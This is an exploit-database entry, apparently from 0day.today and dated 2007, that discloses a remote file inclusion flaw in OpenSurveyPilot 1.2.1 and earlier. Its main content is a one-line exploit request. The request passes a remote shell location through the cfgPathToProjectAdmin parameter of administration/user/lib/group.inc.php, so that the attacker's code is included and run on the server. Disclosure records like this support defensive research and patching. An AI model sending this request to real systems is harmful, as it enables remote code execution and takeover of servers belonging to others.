id: 1780
date: 04/17/2007
title: OpenSurveyPilot <= 1.2.1 Remote File Inclusion Vulnerability
author: Alkomandoz Hacker
cves: 

============================================================
OpenSurveyPilot <= 1.2.1 Remote File Inclusion Vulnerability
============================================================



# osp <= 1.2.1 (cfgPathToProjectAdmin) Remote File Include Vulnerablities

# D.Script: http://nlcac.internationalstudents.asn.au/osp1.01RC1.tar
			http://sourceforge.net/projects/osp/ << latest
			
# Discovered by: Alkomandoz Hacker

# Exploit:

[Path]/opensurveypilot/administration/user/lib/group.inc.php?cfgPathToProjectAdmin=Shell

-----------------------



#  0day.today [2023-03-27]  #